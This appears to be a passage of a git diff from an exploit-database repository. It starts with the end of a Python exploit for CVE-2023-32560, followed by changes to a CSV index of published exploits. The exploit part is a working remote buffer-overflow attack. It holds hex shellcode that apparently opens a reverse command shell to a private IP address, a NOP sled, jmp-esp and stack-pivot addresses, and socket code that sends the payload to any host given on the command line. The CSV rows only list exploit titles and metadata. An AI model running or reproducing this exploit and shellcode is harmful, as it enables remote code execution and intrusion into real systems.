b"518b592001d38b4918e33a49" +shellcode += b"8b348b01d631ffacc1cf0d01" +shellcode += b"c738e075f6037df83b7d2475" +shellcode += b"e4588b582401d3668b0c4b8b" +shellcode += b"581c01d38b048b01d0894424" +shellcode += b"245b5b61595a51ffe05f5f5a" +shellcode += b"8b12eb8d5d68333200006877" +shellcode += b"73325f54684c772607ffd5b8" +shellcode += b"9001000029c454506829806b" +shellcode += b"00ffd5505050504050405068" +shellcode += b"ea0fdfe0ffd5976a0568c0a8" +shellcode += b"561e680200115c89e66a1056" +shellcode += b"576899a57461ffd585c0740c" +shellcode += b"ff4e0875ec68f0b5a256ffd5" +shellcode += b"68636d640089e357575731f6" +shellcode += b"6a125956e2fd66c744243c01" +shellcode += b"018d442410c6004454505656" +shellcode += b"5646564e565653566879cc3f" +shellcode += b"86ffd589e04e5646ff306808" +shellcode += b"871d60ffd5bbe01d2a0a68a6" +shellcode += b"95bd9dffd53c067c0a80fbe0" +shellcode += b"7505bb4713726f6a0053ffd5" + +buf = b'90' * 340 +buf += b'812b4100' # jmp esp (0x00412b81) +buf += b'90909090' +buf += b'90909090' +buf += shellcode +buf += b'41' * 80 +buf += b'84d45200' # stack pivot: add esp, 0x00000FA0 ; retn 0x0004 ; (0x0052d484) +buf += b'43' * (0x800 - len(buf)) + +buf2 = b'41' * 0x1000 + +# Create message payload +hdr = [Item(3, "pwned", buf)] +payload = [Item(3, "pwned", buf2)] # dummy payload, probabaly not necessary +hp_instance = HP(hdr, payload) +msg_instance = Msg(hp_instance) + +# Default port +port = 1777 + +# check for target host argument +if len(sys.argv) > 1: + host = sys.argv[1] +else: + print("Usage: python3 CVE-2023-32560.py ") + sys.exit() + +with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: + s.connect((host, port)) + s.sendall(msg_instance.pack()) + print("Message sent!") + s.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 3beec49db..df666aeb8 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -4299,6 +4299,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 44580,exploits/hardware/webapps/44580.txt,"DLINK DCS-5020L - Remote Code Execution (PoC)",2018-03-27,"Fidus InfoSecurity",webapps,hardware,,2018-05-03,2022-11-04,0,CVE-2017-17020,,,,,https://www.fidusinfosec.com/dlink-dcs-5030l-remote-code-execution-cve-2017-17020/ 44388,exploits/hardware/webapps/44388.txt,"DLink DIR-601 - Admin Password Disclosure",2018-04-02,"Kevin Randall",webapps,hardware,,2018-04-02,2018-04-02,0,CVE-2018-5708,,,,, 45306,exploits/hardware/webapps/45306.txt,"DLink DIR-601 - Credential Disclosure",2018-08-30,"Kevin Randall",webapps,hardware,,2018-08-30,2018-08-30,0,CVE-2018-12710,,,,, +51709,exploits/hardware/webapps/51709.txt,"DLINK DPH-400SE - Exposure of Sensitive Information",2023-09-04,tahaafarooq,webapps,hardware,,2023-09-04,2023-09-04,0,,,,,, 43898,exploits/hardware/webapps/43898.html,"Dodocool DC38 N300 - Cross-site Request Forgery",2018-01-26,"Raffaele Sabato",webapps,hardware,,2018-01-26,2018-01-26,0,CVE-2018-5720,,,,, 48436,exploits/hardware/webapps/48436.txt,"Draytek VigorAP 1000C - Persistent Cross-Site Scripting",2020-05-07,Vulnerability-Lab,webapps,hardware,,2020-05-07,2020-05-07,0,,,,,, 36286,exploits/hardware/webapps/36286.txt,"DreamBox DM800 - 'file' Local File Disclosure",2011-11-04,"Todor Donev",webapps,hardware,,2011-11-04,2017-07-19,1,CVE-2011-4716;OSVDB-73430,,,,,https://www.securityfocus.com/bid/50520/info @@ -11781,6 +11782,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,,2017-09-27,2017-09-27,0,,,,,,https://forsec.nl/2017/09/smart-home-remote-command-execution-rce/ 48240,exploits/multiple/webapps/48240.txt,"FIBARO System Home Center 5.021 - Remote File Include",2020-03-23,LiquidWorm,webapps,multiple,,2020-03-23,2020-03-23,0,,,,,, 50717,exploits/multiple/webapps/50717.txt,"FileBrowser 2.17.2 - Cross Site Request Forgery (CSRF) to Remote Code Execution (RCE)",2022-02-08,"FEBIN MON SAJI",webapps,multiple,,2022-02-08,2022-02-08,0,CVE-2021-46398,,,,, +51708,exploits/multiple/webapps/51708.py,"FileMage Gateway 1.10.9 - Local File Inclusion",2023-09-04,"Bryce Raindayzz Harty",webapps,multiple,,2023-09-04,2023-09-04,0,CVE-2023-39026,,,,, 48607,exploits/multiple/webapps/48607.txt,"FileRun 2019.05.21 - Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,multiple,,2020-06-22,2020-06-22,0,CVE-2019-12905,,,,, 23111,exploits/multiple/webapps/23111.txt,"FirePass SSL VPN - Local File Inclusion",2012-12-03,"SEC Consult",webapps,multiple,,2012-12-03,2012-12-03,0,OSVDB-88091,,,,, 35743,exploits/multiple/webapps/35743.txt,"Flash Tag Cloud And MT-Cumulus Plugin - 'tagcloud' Cross-Site Scripting",2011-05-13,MustLive,webapps,multiple,,2011-05-13,2015-01-10,1,,,,,,https://www.securityfocus.com/bid/47845/info @@ -13315,6 +13317,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 45596,exploits/php/webapps/45596.txt,"Academic Timetable Final Build 7.0a-7.0b - 'id' SQL Injection",2018-10-15,"Ihsan Sencan",webapps,php,80,2018-10-15,2018-10-18,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comAcademic_Timetable_Final_Build_v70.zip, 45600,exploits/php/webapps/45600.txt,"Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin)",2018-10-15,"Ihsan Sencan",webapps,php,80,2018-10-15,2018-10-18,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comAcademic_Timetable_Final_Build_v70.zip, 51654,exploits/php/webapps/51654.txt,"Academy LMS 6.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4119,,,,, +51702,exploits/php/webapps/51702.txt,"Academy LMS 6.1 - Arbitrary File Upload",2023-09-04,CraCkEr,webapps,php,,2023-09-04,2023-09-04,0,,,,,, 36110,exploits/php/webapps/36110.txt,"ACal 2.2.6 - 'calendar.php' Cross-Site Scripting",2011-09-02,T0xic,webapps,php,,2011-09-02,2015-04-18,1,,,,,http://www.exploit-db.comACal-2.2.6.zip,https://www.securityfocus.com/bid/49442/info 1763,exploits/php/webapps/1763.txt,"ACal 2.2.6 - 'day.php' Remote File Inclusion",2006-05-07,PiNGuX,webapps,php,,2006-05-06,2015-04-18,1,OSVDB-25340;CVE-2006-2261,,,,http://www.exploit-db.comACal-2.2.6.zip, 38697,exploits/php/webapps/38697.txt,"ACal 2.2.6 - 'view' Local File Inclusion",2013-08-15,ICheer_No0M,webapps,php,,2013-08-15,2015-11-15,1,OSVDB-96304,,,,,https://www.securityfocus.com/bid/61801/info @@ -13490,6 +13493,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 4005,exploits/php/webapps/4005.txt,"AdminBot 9.0.5 - 'live_status.lib.php' Remote File Inclusion",2007-05-29,"ThE TiGeR",webapps,php,,2007-05-28,2016-12-22,1,OSVDB-38364;CVE-2007-2986,,,,, 43593,exploits/php/webapps/43593.txt,"Adminer 4.3.1 - Server-Side Request Forgery",2018-01-15,hyp3rlinx,webapps,php,,2018-01-15,2018-12-14,0,,,,,, 9075,exploits/php/webapps/9075.txt,"AdminLog 0.5 - 'valid_login' Authentication Bypass",2009-07-02,SirGod,webapps,php,,2009-07-01,,1,OSVDB-55602,,,,, +51705,exploits/php/webapps/51705.txt,"AdminLTE PiHole 5.18 - Broken Access Control",2023-09-04,kv1to,webapps,php,,2023-09-04,2023-09-04,0,CVE-2022-23513,,,,, 6640,exploits/php/webapps/6640.pl,"ADN Forum 1.0b - Blind SQL Injection",2008-10-01,StAkeR,webapps,php,,2008-09-30,2016-12-23,1,CVE-2006-0123;OSVDB-22240,,,,http://www.exploit-db.comadnforum-1.0b.zip, 6557,exploits/php/webapps/6557.txt,"ADN Forum 1.0b - Insecure Cookie Handling",2008-09-24,Pepelux,webapps,php,,2008-09-23,2016-12-23,1,OSVDB-52458;CVE-2008-6001,,,,http://www.exploit-db.comadnforum-1.0b.zip, 28104,exploits/php/webapps/28104.txt,"ADODB 4.6/4.7 - 'Tmssql.php' Cross-Site Scripting",2006-06-26,"Rodrigo Silva",webapps,php,,2006-06-26,2013-09-05,1,OSVDB-27620,,,,,https://www.securityfocus.com/bid/18638/info @@ -14904,6 +14908,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 28574,exploits/php/webapps/28574.txt,"Blojsom 2.31 - Cross-Site Scripting",2006-09-14,"Avinash Shenoi",webapps,php,,2006-09-14,2013-09-27,1,CVE-2006-4829;OSVDB-28834,,,,,https://www.securityfocus.com/bid/20026/info 5234,exploits/php/webapps/5234.txt,"Bloo 1.00 - Multiple SQL Injections",2008-03-11,MhZ91,webapps,php,,2008-03-10,2016-11-23,1,OSVDB-42778;CVE-2008-1313,,,,http://www.exploit-db.combloo.v.1.00.tgz, 50362,exploits/php/webapps/50362.txt,"Blood Bank System 1.0 - Authentication Bypass",2021-10-01,"Nitin Sharma",webapps,php,,2021-10-01,2021-10-28,0,,,,,, +51697,exploits/php/webapps/51697.txt,"Blood Donor Management System v1.0 - Stored XSS",2023-09-04,"Ehlullah Albayrak",webapps,php,,2023-09-04,2023-09-04,0,,,,,, 47842,exploits/php/webapps/47842.txt,"BloodX 1.0 - Authentication Bypass",2020-01-02,riamloo,webapps,php,,2020-01-02,2020-02-07,1,,,,,, 48786,exploits/php/webapps/48786.txt,"BloodX CMS 1.0 - Authentication Bypass",2020-09-03,BKpatron,webapps,php,,2020-09-03,2020-09-03,0,,,,,, 4945,exploits/php/webapps/4945.txt,"bloofox 0.3 - SQL Injection / File Disclosure",2008-01-20,BugReport.IR,webapps,php,,2008-01-19,2016-10-27,1,OSVDB-40437;CVE-2008-0428;OSVDB-40436;CVE-2008-0427,,,,,http://bugreport.ir/?/27 @@ -15159,6 +15164,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",2021-09-06,sudoninja,webapps,php,,2021-09-06,2023-07-15,1,,,,,, 50235,exploits/php/webapps/50235.txt,"Bus Pass Management System 1.0 - 'viewid' SQL Injection",2021-08-30,"Aryan Chehreghani",webapps,php,,2021-08-30,2023-07-15,1,,,,,, 51054,exploits/php/webapps/51054.txt,"Bus Pass Management System 1.0 - Cross-Site Scripting (XSS)",2023-03-25,"Ali Alipour",webapps,php,,2023-03-25,2023-06-26,1,CVE-2022-35155,,,,, +51712,exploits/php/webapps/51712.txt,"Bus Reservation System 1.1 - Multiple-SQLi",2023-09-04,nu11secur1ty,webapps,php,,2023-09-04,2023-09-04,0,,,,,, 9633,exploits/php/webapps/9633.txt,"Bus Script - 'sitetext_id' SQL Injection",2009-09-10,Mr.SQL,webapps,php,,2009-09-09,,1,OSVDB-57985;CVE-2009-4618;OSVDB-57984,,,,, 41561,exploits/php/webapps/41561.txt,"Busewe 1.2 - SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php,,2017-03-09,2017-03-09,0,,,,,, 41097,exploits/php/webapps/41097.txt,"Business Directory Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php,,2017-01-18,2017-01-18,0,,,,,, @@ -16379,6 +16385,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 27835,exploits/php/webapps/27835.txt,"Creative Software UK Community Portal 1.1 - 'PollResults.php' Multiple SQL Injections",2006-05-08,r0t,webapps,php,,2006-05-08,2013-08-25,1,CVE-2006-2255;OSVDB-25311,,,,,https://www.securityfocus.com/bid/17890/info 11300,exploits/php/webapps/11300.txt,"Creative SplashWorks-SplashSite - 'page.php' Blind SQL Injection",2010-01-31,AtT4CKxT3rR0r1ST,webapps,php,,2010-01-30,,0,,,,,, 12807,exploits/php/webapps/12807.txt,"Creato Script - SQL Injection",2010-05-30,Mr.P3rfekT,webapps,php,,2010-05-29,,1,,,,,, +51701,exploits/php/webapps/51701.txt,"Credit Lite 1.5.4 - SQL Injection",2023-09-04,CraCkEr,webapps,php,,2023-09-04,2023-09-04,0,CVE-2023-4407,,,,, 1446,exploits/php/webapps/1446.pl,"creLoaded 6.15 - 'HTMLAREA' Automated Perl",2006-01-24,kaneda,webapps,php,,2006-01-23,,1,OSVDB-22793;CVE-2006-0478,,,,, 35631,exploits/php/webapps/35631.txt,"CRESUS - 'recette_detail.php' SQL Injection",2011-04-19,"GrayHatz Security Group",webapps,php,,2011-04-19,2014-12-27,1,,,,,,https://www.securityfocus.com/bid/47416/info 50213,exploits/php/webapps/50213.txt,"Crime records Management System 1.0 - 'Multiple' SQL Injection (Authenticated)",2021-08-18,"Davide Taraschi",webapps,php,,2021-08-18,2021-08-18,0,,,,,, @@ -16425,6 +16432,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50846,exploits/php/webapps/50846.txt,"CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated)",2022-03-30,"Rahad Chowdhury",webapps,php,,2022-03-30,2022-03-30,0,CVE-2021-43701,,,,, 49364,exploits/php/webapps/49364.txt,"CSZ CMS 1.2.9 - Multiple Cross-Site Scripting",2021-01-05,SunCSR,webapps,php,,2021-01-05,2021-01-05,0,,,,,, 50899,exploits/php/webapps/50899.txt,"CSZ CMS 1.3.0 - 'Multiple' Blind SQLi",2022-05-11,"Dogukan Dincer",webapps,php,,2022-05-11,2022-05-11,0,,,,,, +51703,exploits/php/webapps/51703.txt,"CSZ CMS 1.3.0 - Stored Cross-Site Scripting ('Photo URL' and 'YouTube URL' )",2023-09-04,"Daniel González",webapps,php,,2023-09-04,2023-09-04,0,,,,,, +51704,exploits/php/webapps/51704.txt,"CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')",2023-09-04,"Daniel González",webapps,php,,2023-09-04,2023-09-04,0,,,,,, 31517,exploits/php/webapps/31517.txt,"CTERA 3.2.29.0/3.2.42.0 - Persistent Cross-Site Scripting",2014-02-07,"Luigi Vezzoso",webapps,php,80,2014-02-07,2014-02-07,0,CVE-2013-2639;OSVDB-103117,,,,, 11063,exploits/php/webapps/11063.txt,"CU Village CMS Site 1.0 - 'print_view' Blind SQL Injection",2010-01-08,Red-D3v1L,webapps,php,,2010-01-07,,1,,,,,, 11495,exploits/php/webapps/11495.txt,"CubeCart - 'index.php' SQL Injection",2010-02-18,AtT4CKxT3rR0r1ST,webapps,php,,2010-02-17,,1,,,,,, @@ -19628,6 +19637,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 44954,exploits/php/webapps/44954.txt,"hycus CMS 1.0.4 - Authentication Bypass",2018-06-28,"Berk Dusunur",webapps,php,,2018-06-28,2018-06-28,0,,"Authentication Bypass / Credentials Bypass (AB/CB)",,,, 16213,exploits/php/webapps/16213.txt,"Hyena Cart - 'index.php' SQL Injection",2011-02-23,AtT4CKxT3rR0r1ST,webapps,php,,2011-02-23,2011-02-23,1,,,,,, 29909,exploits/php/webapps/29909.txt,"HYIP Manager Pro - Multiple Remote File Inclusions",2007-04-25,alijsb,webapps,php,,2007-04-25,2013-11-29,1,CVE-2007-2326;OSVDB-35554,,,,,https://www.securityfocus.com/bid/23663/info +51698,exploits/php/webapps/51698.txt,"Hyip Rio 2.1 - Arbitrary File Upload",2023-09-04,CraCkEr,webapps,php,,2023-09-04,2023-09-04,0,CVE-2023-4382,,,,, 32395,exploits/php/webapps/32395.txt,"HyperStop WebHost Directory 1.2 - Database Disclosure",2008-09-19,r45c4l,webapps,php,,2008-09-19,2014-03-20,1,CVE-2008-7008;OSVDB-48282,,,,,https://www.securityfocus.com/bid/31249/info 46776,exploits/php/webapps/46776.txt,"Hyvikk Fleet Manager - Shell Upload",2019-04-30,saxgy1331,webapps,php,,2019-04-30,2019-05-01,0,,,,,, 41979,exploits/php/webapps/41979.txt,"I_ Librarian 4.6/4.7 - Command Injection / Server Side Request Forgery / Directory Enumeration / Cross-Site Scripting",2017-05-09,"SEC Consult",webapps,php,,2017-05-09,2017-05-09,1,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comI-Librarian-4.6-Linux.tar.xz, @@ -23180,6 +23190,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 39124,exploits/php/webapps/39124.txt,"MeiuPic 2.1.2 - 'ctl' Local File Inclusion",2014-03-10,Dr.3v1l,webapps,php,,2014-03-10,2016-10-24,1,OSVDB-105001,,,,,https://www.securityfocus.com/bid/66317/info 5648,exploits/php/webapps/5648.pl,"MeltingIce File System 1.0 - Arbitrary Add User",2008-05-18,t0pP8uZz,webapps,php,,2008-05-17,2016-12-02,1,OSVDB-45512;CVE-2008-2348,,,,http://www.exploit-db.commeltingice_file_system_v1.0.zip, 12850,exploits/php/webapps/12850.txt,"Member ID The Fish Index PHP - SQL Injection",2010-06-03,v4lc0m87,webapps,php,,2010-06-02,,1,,,,,, +51710,exploits/php/webapps/51710.txt,"Member Login Script 3.3 - Client-side desync",2023-09-04,nu11secur1ty,webapps,php,,2023-09-04,2023-09-04,0,,,,,, 7638,exploits/php/webapps/7638.txt,"Memberkit 1.0 - Arbitrary File Upload",2009-01-01,Lo$er,webapps,php,,2008-12-31,2017-01-11,1,OSVDB-51207,,,,, 31011,exploits/php/webapps/31011.txt,"Members Area System 1.7 - 'view_func.php' Remote File Inclusion",2008-01-11,ShipNX,webapps,php,,2008-01-11,2014-01-17,1,CVE-2008-0289;OSVDB-40326,,,,,https://www.securityfocus.com/bid/27244/info 41780,exploits/php/webapps/41780.txt,"Membership Formula - 'order' SQL Injection",2017-03-31,"Ihsan Sencan",webapps,php,,2017-03-31,2017-03-31,0,,,,,, @@ -30012,6 +30023,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 7946,exploits/php/webapps/7946.txt,"sourdough 0.3.5 - Remote File Inclusion",2009-02-02,ahmadbady,webapps,php,,2009-02-01,,1,OSVDB-51822;CVE-2009-0456,,,,, 45736,exploits/php/webapps/45736.txt,"South Gate Inn Online Reservation System 1.0 - 'q' SQL Injection",2018-10-30,"Ihsan Sencan",webapps,php,80,2018-10-30,2018-10-30,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comsouthgateinn_0.zip, 11430,exploits/php/webapps/11430.txt,"southburn Web - 'products.php' SQL Injection",2010-02-13,AtT4CKxT3rR0r1ST,webapps,php,,2010-02-12,,1,,,,,, +51713,exploits/php/webapps/51713.txt,"SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS",2023-09-04,CraCkEr,webapps,php,,2023-09-04,2023-09-04,0,CVE-2023-4547,,,,, 12756,exploits/php/webapps/12756.txt,"Spaceacre - '/index.php' SQL Injection / HTML / Cross-Site Scripting Injection",2010-05-26,CoBRa_21,webapps,php,,2010-05-25,,1,,,,,, 12551,exploits/php/webapps/12551.txt,"Spaceacre - Multiple SQL Injections",2010-05-10,gendenk,webapps,php,,2010-05-09,,1,,,,,, 12746,exploits/php/webapps/12746.txt,"Spaceacre - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-26,XroGuE,webapps,php,,2010-05-25,,1,,,,,, @@ -32133,8 +32145,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 17057,exploits/php/webapps/17057.txt,"webEdition CMS - Local File Inclusion",2011-03-28,eidelweiss,webapps,php,,2011-03-28,2011-10-02,0,,,,,http://www.exploit-db.comwebEdition_6102.tar.gz,http://eidelweiss-advisories.blogspot.com/2011/03/webedition-cms-version-6102.html 35516,exploits/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 - 'DOCUMENT_ROOT' Local File Inclusion",2011-03-28,eidelweiss,webapps,php,,2011-03-28,2014-12-10,1,,,,,,https://www.securityfocus.com/bid/47065/info 17054,exploits/php/webapps/17054.txt,"webEdition CMS 6.1.0.2 - Multiple Vulnerabilities",2011-03-27,"AutoSec Tools",webapps,php,,2011-03-27,2011-03-29,1,,,,,http://www.exploit-db.comwebEdition_6102.tar.gz, -51661,exploits/php/webapps/51661.txt,"Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)",2023-08-04,"Mirabbas Ağalarov",webapps,php,,2023-08-04,2023-08-04,0,,,,,, -51662,exploits/php/webapps/51662.txt,"Webedition CMS v2.9.8.8 - Stored XSS",2023-08-04,"Mirabbas Ağalarov",webapps,php,,2023-08-04,2023-08-04,0,,,,,, +51661,exploits/php/webapps/51661.txt,"Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)",2023-08-04,"Mirabbas Ağalarov",webapps,php,,2023-08-04,2023-09-04,1,,,,,, +51662,exploits/php/webapps/51662.txt,"Webedition CMS v2.9.8.8 - Stored XSS",2023-08-04,"Mirabbas Ağalarov",webapps,php,,2023-08-04,2023-09-04,1,,,,,, 14132,exploits/php/webapps/14132.html,"webERP 3.11.4 - Multiple Vulnerabilities",2010-06-30,"ADEO Security",webapps,php,,2010-06-30,2010-07-07,0,OSVDB-65930,,,,http://www.exploit-db.comwebERP_3.11.4.zip, 35333,exploits/php/webapps/35333.py,"webERP 4.0.1 - 'InputSerialItemsFile.php' Arbitrary File Upload",2011-02-10,"AutoSec Tools",webapps,php,,2011-02-10,2014-11-23,1,,,,,,https://www.securityfocus.com/bid/46341/info 19431,exploits/php/webapps/19431.txt,"webERP 4.08.1 - Local/Remote File Inclusion",2012-06-28,dun,webapps,php,,2012-06-28,2012-06-29,1,OSVDB-83414;OSVDB-83400,,,,, @@ -33898,6 +33910,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51122,exploits/php/webapps/51122.py,"WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)",2023-03-29,AkuCyberSec,webapps,php,,2023-03-29,2023-06-09,1,CVE-2022-1565,,,,, 51560,exploits/php/webapps/51560.txt,"WP AutoComplete 1.0.4 - Unauthenticated SQLi",2023-07-03,matitanium,webapps,php,,2023-07-03,2023-07-03,0,CVE-2022-4297,,,,, 47419,exploits/php/webapps/47419.txt,"WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting",2019-09-25,strider,webapps,php,,2019-09-25,2019-09-25,0,,,,,, +51711,exploits/php/webapps/51711.py,"WP Statistics Plugin 13.1.5 current_page_id - Time based SQL injection (Unauthenticated)",2023-09-04,psychoSherlock,webapps,php,,2023-09-04,2023-09-04,0,CVE-2022-25148,,,,, 51533,exploits/php/webapps/51533.py,"WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)",2023-06-20,"Amirhossein Bahramizadeh",webapps,php,,2023-06-20,2023-06-20,0,CVE-2023-3320,,,,, 51224,exploits/php/webapps/51224.py,"WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE",2023-04-03,BLY,webapps,php,,2023-04-03,2023-05-24,1,CVE-2020-25213,,,,, 51152,exploits/php/webapps/51152.txt,"WPForms 1.7.8 - Cross-Site Scripting (XSS)",2023-03-30,"Milad karimi",webapps,php,,2023-03-30,2023-03-30,0,,,,,, @@ -40065,6 +40078,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 17607,exploits/windows/local/17607.rb,"FreeAmp 2.0.7 - '.fat' Local Buffer Overflow (Metasploit)",2011-08-04,"James Fitts",local,windows,,2011-08-04,2011-08-06,1,,"Metasploit Framework (MSF)",,http://www.exploit-db.com/screenshots/idlt18000/17607.png,http://www.exploit-db.comfreeampsetup_2_0_7.exe, 15727,exploits/windows/local/15727.py,"FreeAmp 2.0.7 - '.m3u' Local Buffer Overflow",2010-12-11,zota,local,windows,,2010-12-11,2011-06-23,1,OSVDB-72290,,,http://www.exploit-db.com/screenshots/idlt16000/freeamp.png,http://www.exploit-db.comfreeampsetup_2_0_7.exe, 17449,exploits/windows/local/17449.py,"FreeAmp 2.0.7 - '.pls' Local Buffer Overflow",2011-06-24,"C4SS!0 G0M3S",local,windows,,2011-06-24,2011-06-25,1,,,,http://www.exploit-db.com/screenshots/idlt17500/screen-shot-2011-06-25-at-83233-am.png,http://www.exploit-db.comfreeampsetup_2_0_7.exe, +51706,exploits/windows/local/51706.txt,"Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow",2023-09-04,"Waqas Ahmed Faroouqi",local,windows,,2023-09-04,2023-09-04,0,,,,,, 48043,exploits/windows/local/48043.txt,"freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path",2020-02-11,boku,local,windows,,2020-02-11,2020-02-11,0,,,,,http://www.exploit-db.comfreeFTPd.exe, 49630,exploits/windows/local/49630.txt,"FreeLAN 2.2 - 'FreeLAN Service' Unquoted Service Path",2021-03-09,"Mohammed Alshehri",local,windows,,2021-03-09,2021-03-09,0,,,,,, 48044,exploits/windows/local/48044.txt,"FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path",2020-02-11,boku,local,windows,,2020-02-11,2020-02-11,0,,,,,http://www.exploit-db.comfreeSSHd.exe, @@ -40324,6 +40338,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 11872,exploits/windows/local/11872.py,"KenWard's Zipper 1.400 - Local Buffer Overflow (2)",2010-03-25,sinn3r,local,windows,,2010-03-24,2011-01-03,1,OSVDB-63125,,,http://www.exploit-db.com/screenshots/idlt12000/screen-shot-2011-01-03-at-82314-pm.png,http://www.exploit-db.cominstzip3.exe, 29374,exploits/windows/local/29374.txt,"Kerio Personal Firewall 4.3 - 'IPHLPAPI.dll' Local Privilege Escalation",2007-01-01,"Matousec Transparent security",local,windows,,2007-01-01,2013-11-11,1,CVE-2007-0081;OSVDB-33356,,,,,https://www.securityfocus.com/bid/21828/info 50470,exploits/windows/local/50470.py,"Kingdia CD Extractor 3.0.2 - Buffer Overflow (SEH)",2021-11-02,stresser,local,windows,,2021-11-02,2021-11-02,0,,,,,http://www.exploit-db.comkingdia-cd-ex.exe, +51707,exploits/windows/local/51707.txt,"Kingo ROOT 1.5.8 - Unquoted Service Path",2023-09-04,"Anish Feroz",local,windows,,2023-09-04,2023-09-04,0,,,,,, 17561,exploits/windows/local/17561.c,"Kingsoft AntiVirus 2012 'KisKrnl.sys' 2011.7.8.913 - Kernel Mode Privilege Escalation",2011-07-22,MJ0011,local,windows,,2011-07-22,2019-03-07,0,,,,,, 43421,exploits/windows/local/43421.py,"Kingsoft Antivirus/Internet Security 9+ - Local Privilege Escalation",2018-01-03,mr_me,local,windows,,2018-01-03,2018-01-15,1,,Local,,,,https://blogs.securiteam.com/index.php/archives/3597 29922,exploits/windows/local/29922.py,"Kingsoft Office Writer 2012 8.1.0.3385 - '.wps' Local Buffer Overflow (SEH)",2013-11-30,"Julien Ahrens",local,windows,,2013-12-02,2013-12-02,1,CVE-2013-3934,,,http://www.exploit-db.com/screenshots/idlt30000/screen-shot-2013-12-02-at-105654.png,http://www.exploit-db.comoffice_suite_free_2012.exe, @@ -41063,6 +41078,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 4703,exploits/windows/local/4703.pl,"NullSoft Winamp 5.32 - .MP4 Tags Stack Overflow",2007-12-08,"SYS 49152",local,windows,,2007-12-07,2016-10-25,1,OSVDB-41695;CVE-2007-6403,,,,http://www.exploit-db.comwinamp532_full.exe, 14789,exploits/windows/local/14789.c,"NullSoft Winamp 5.581 - 'wnaspi32.dll' DLL Hijacking",2010-08-25,LiquidWorm,local,windows,,2010-08-25,2010-08-25,1,CVE-2010-3137;OSVDB-67532,,,,http://www.exploit-db.comwinamp558_full_emusic-7plus_en-us.exe, 6389,exploits/windows/local/6389.cpp,"Numark Cue 5.0 rev 2 - '.m3u' File Local Stack Buffer Overflow",2008-09-06,"fl0 fl0w",local,windows,,2008-09-05,,1,OSVDB-47975;CVE-2008-4470,,,,, +51700,exploits/windows/local/51700.txt,"NVClient v5.0 - Stack Buffer Overflow (DoS)",2023-09-04,"Ahmet Ümit BAYRAM",local,windows,,2023-09-04,2023-09-04,0,,,,,, 24207,exploits/windows/local/24207.c,"Nvidia Display Driver Service (Nsvr) - Local Buffer Overflow",2013-01-18,"Jon Bailey",local,windows,,2013-01-18,2017-11-15,0,OSVDB-88745,,,,, 14769,exploits/windows/local/14769.c,"Nvidia Driver - 'nview.dll' DLL Hijacking",2010-08-25,Encrypt3d.M!nd,local,windows,,2010-08-25,2010-08-25,0,OSVDB-67574,,nvidia-poc.rar,,, 40660,exploits/windows/local/40660.txt,"NVIDIA Driver - NvStreamKms 'PsSetCreateProcessNotifyRoutineEx Local Stack Buffer Overflow Callback / Local Privilege Escalation",2016-10-31,"Google Security Research",local,windows,,2016-10-31,2016-10-31,1,CVE-2016-8812,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=918 @@ -43272,6 +43288,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 34830,exploits/windows/remote/34830.c,"IsoBuster 2.7 - 'wnaspi32.dll' DLL Loading Arbitrary Code Execution",2010-10-10,Pepelux,remote,windows,,2010-10-10,2014-10-01,1,,,,,,https://www.securityfocus.com/bid/43912/info 16464,exploits/windows/remote/16464.rb,"ISS - 'PAM.dll' ICQ Parser Buffer Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows,,2010-09-20,2011-03-10,1,CVE-2004-0362;OSVDB-4355,"Metasploit Framework (MSF)",,,,http://www.eeye.com/html/Research/Advisories/AD20040318.html 20637,exploits/windows/remote/20637.txt,"itafrica webactive 1.0 - Directory 